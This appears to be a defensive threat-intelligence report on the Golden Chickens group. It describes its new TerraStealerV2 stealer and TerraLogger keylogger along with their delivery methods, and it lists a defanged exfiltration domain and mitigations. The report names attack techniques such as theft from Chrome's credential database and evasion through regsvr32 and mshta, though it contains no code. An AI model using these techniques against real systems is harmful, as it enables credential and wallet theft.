Full Report
The threat actors known as Golden Chickens have been attributed to two new malware families dubbed TerraStealerV2 and TerraLogger, suggesting continued development efforts to fine-tune and diversify their arsenal. "TerraStealerV2 is designed to collect browser credentials, cryptocurrency wallet data, and browser extension information," Recorded Future Insikt Group said. "TerraLogger, by contrast
Analysis Summary
# Threat Actor: Golden Chickens
## Attribution & Identity
**Name/Alias:** Golden Chickens
**Known Aliases:** Venom Spider
**Associated Groups:** Linked historically to the More\_eggs malware family offering services under a Malware-as-a-Service (MaaS) model.
**Attribution Notes:** Active since at least 2018. Attributed in 2023 to an online persona known as `badbullzvenom`, believed to be operated jointly by individuals from Canada and Romania.
## Activity Summary
Golden Chickens continues to develop and diversify its malware arsenal, demonstrated by the release of two new families: TerraStealerV2 and TerraLogger. The group is known for its MaaS operations. Recent activity has also included the use of a backdoor called RevC2 and a loader named Venom Loader, often delivered via the VenomLNK file type. The development of TerraStealerV2 suggests an ongoing focus on credential theft, though its current version appears slightly outdated regarding recent Chrome security enhancements (ABE).
## Tactics, Techniques & Procedures
- **Data Stealing:** TerraStealerV2 is designed to collect browser credentials (targeting Chrome 'Login Data' database), cryptocurrency wallet data, and browser extension information.
- **Keylogging:** TerraLogger functions as a standalone keylogger using a common low-level keyboard hook.
- **File Execution/Delivery:** Payloads delivered via Executable files (EXEs), Dynamic-link libraries (DLLs), Windows Installer packages (MSI), and Shortcut (LNK) files.
- **Defense Evasion:** Leveraging trusted Windows utilities such as `regsvr32.exe` and `mshta.exe` for execution/evasion.
- **Initial Access/Delivery Mechanism:** Use of VenomLNK to deliver payloads like RevC2 and Venom Loader.
## Targeting
**Sectors:** Generalized financial motivation suggests targeting sectors where sensitive credentials or financial data are prevalent.
**Geography:** Not explicitly detailed in the context of recent campaigns, but the alleged operators have ties to Canada and Romania.
**Victims:** Specific organizations are not detailed, but objectives focus on credentials and wallet data.
## Tools & Infrastructure
**Malware Families Used:**
* TerraStealerV2 (New stealer)
* TerraLogger (New keylogger)
* More\_eggs (Notorious base family)
* More\_eggs lite (oka lite\_more\_eggs)
* VenomLNK
* TerraLoader
* TerraCrypt
* RevC2 (Backdoor)
* Venom Loader
**Infrastructure:**
* **Exfiltration Domain:** `wetransfers[.]io` (used for data exfiltration and OCX payload retrieval)
* **Exfiltration Channel:** Telegram
* **Delivery Format:** Payloads are delivered as OCX files retrieved from external infrastructure.
## Implications
Golden Chickens remains a persistent and adaptive e-crime operation driven by financial motives, operating extensively via a MaaS model. The continuous development of new but slightly unrefined tools indicates active research and development cycles, suggesting that TerraStealerV2 and TerraLogger will likely mature into more stealthy and effective modules for credential harvesting and espionage in the near future.
## Mitigations
- Implement robust endpoint detection and response (EDR) to monitor for the execution of trusted Windows utilities (`regsvr32.exe`, `mshta.exe`) for suspicious purposes.
- Scrutinize emails and distribution vectors regarding execution attempts using unusual file types like LNK, MSI, and OCX files.
- Ensure Chrome browsers are updated to benefit from newer protections like Application Bound Encryption (ABE) against credential theft attempts targeting hardcoded databases.
- Monitor for suspicious network traffic destined for Telegram or unknown external domains for data exfiltration.